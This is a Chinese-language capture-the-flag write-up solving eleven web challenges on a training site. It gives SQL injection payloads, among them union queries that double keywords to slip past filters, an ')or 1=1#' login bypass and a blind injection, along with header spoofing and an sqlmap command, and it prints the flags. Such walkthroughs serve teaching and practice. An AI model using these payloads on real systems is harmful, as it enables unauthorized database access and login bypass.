WEB CTF 西普学院

1.菊花

                         http://ctf1.simplexue.com/web/6/  

提示: 

Please make sure you have installed .net framework 9.9!    

用burp拦截，修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)，下面的注入均在这个条件下进行

id=1 提示hacker:welcome to simplexue CTF

id=4提示hacker: don’t try again

id=0/**/ununionion/**/seselectlect/**/1,user(),database()

用户名和数据库名称:root@cuit-092a2b258a      inject

<span style="font-size:14px;">id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--</span>

simplexue: flag is SimCTF{xuectf}                                 

2.Forbidden

                          http://ctf1.simplexue.com/basic/header/
提示:

You don't have permission to access /on this server.

Make sure you are in HongKong
用burp拦截,修改为Accept-Language:zh-hk即可>KEY:123JustUserAGent

3.头有点大

                     http://ctf1.simplexue.com/web/1/index.asp?id=1 提示:

You don't have permission to access / on this server.

Make sure you are in the region of England and browsing this site with Internet Explorer

用burp拦截

修改user-agent为Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)

       Accept-Language:en-gb

The key is:HTTpH34der

4.请输入密码

             http://ctf1.simplexue.com/basic/js/index.asp
用burp拦截

得到JAVAscript

<script type="text/javascript">

    document.oncontextmenu=function(){return false};

    var a,b,c,d,e,f,g;

    a = 3.14;

    b = a * 2;

    c = a + b;

    d = c / b + a;

    e = c - d * b + a;

    f = e + d /c -b * a;

    g = f * e - d + c * b + a;

    a = g * g;

    a = Math.floor(a);

    function check(){

        if(document.getElementById("txt").value==a){

            return true;

        }else{

            alert("密码错误");

            return false;

        }

    }

</script>

写C算出:

#include<stdio.h>

int main()

{

    float a,b,c,d,e,f,g;

    a = 3.14;

    b = a * 2;

    c = a + b;

    d = c / b + a;

    e = c - d * b + a;

    f = e + d /c -b * a;

    g = f * e - d + c * b + a;

    a = g * g;

    printf("%f",a);

    return 0;

}

运算结果:424178.562500   输入:424178  弹出key=>  @#$JSisagoodtool@#$

5.这个看起来有点简单

              http://ctf5.simplexue.com/8/index.php?id=1
id=1'

id=1 and 1=1

id=1 and 1=2                          判断是sql注入

id=1 order by 2                       两个字节

id=1 union select 1,2               回显2

version():                                5.0.45-community-nt

database():                             my_db

user():                                    phpsql@localhost

爆数据库:

 and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,1

                 information_schema     my_db

爆表:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1

                           news           thiskey

爆字段:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1

                                id        content           k0y

爆内容:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump

6.猫抓老鼠

          http://ctf1.simplexue.com/basic/catch/          

查看http发现  Content-Row:    MTQ0ODU0MzEyNA==    填入  MTQ0ODU0MzEyNA==         =>KEY: #WWWnsf0cus_NET#

7.程序员的问题

                        http://ctf1.simplexue.com/web/4/index.php
查看源代码:

<?php

if($_POST[user] && $_POST[pass]) {
$conn = mysql_connect("*******", "****", "****");
mysql_select_db("****") or die("Could not select database");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {
printf("Error: %s\n", mysql_error($conn));
exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
if($row['user']=="admin") {
echo "<p>Logged in! Key: *********** </p>";
}

if($row['user'] != "admin") {
echo("<p>You are not admin!</p>");
}
}

?>

输入admin  提示   You are not admin!  于是想到闭合:  输入=>   ')or 1=1#    得到 Key: WW
4000
W_SIMPLEXUE_COM

8.what a fuck!这是什么鬼东西?

                            http://ctf5.simplexue.com/DUTCTF/1.html 有点晕,想到js加密,于是copy下来加上<script> </script> 弹出  Ihatejs

9.貌似有点难

                         http://ctf8.simplexue.com/phpaudit/
<?php

function GetIP(){

if(!empty($_SERVER["HTTP_CLIENT_IP"]))

    $cip = $_SERVER["HTTP_CLIENT_IP"];

else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))

    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];

else if(!empty($_SERVER["REMOTE_ADDR"]))

    $cip = $_SERVER["REMOTE_ADDR"];

else

    $cip = "0.0.0.0";

return $cip;

}

$GetIPs = GetIP();

if ($GetIPs=="1.1.1.1"){

echo "Great! Key is *********";

}

else{

echo "错误！你的IP不在访问列表之内！";

}

?>

http协议:

用burp拦截   加入   X-Forwarded-For: 1.1.1.1     伪造IP为:   1.1.1.1            => Key is http_client

10.进来就给你想要的

                     http://ctf1.simplexue.com/web/1/index.asp?id=1

这题是找后台:

输入admin  查看源代码提示 =>呵呵，思路是对的哈，但是不在这儿。想想谁的权利最大

输入system     =>KEY: "!!!WellDoneBrother!"

11.看起来有点难

                  http://ctf1.simplexue.com/basic/inject/
这题是盲注题

       输入用户名:admin,密码随意,然后提交

提示:登录失败，错误的用户名和密码

然后这么玩:

     http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login

注:

ascii(str):把字符串转换为ascii码;substr(str,star,length)/substring(str,star,length):截取字符串(str字符串,star启始位置,length长度)

得到数据库:test

然后替换dabases();得到所有数据

注:这题过滤了select,用selselectect替换

用sqlmap这么来:

    sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass="  -D test --table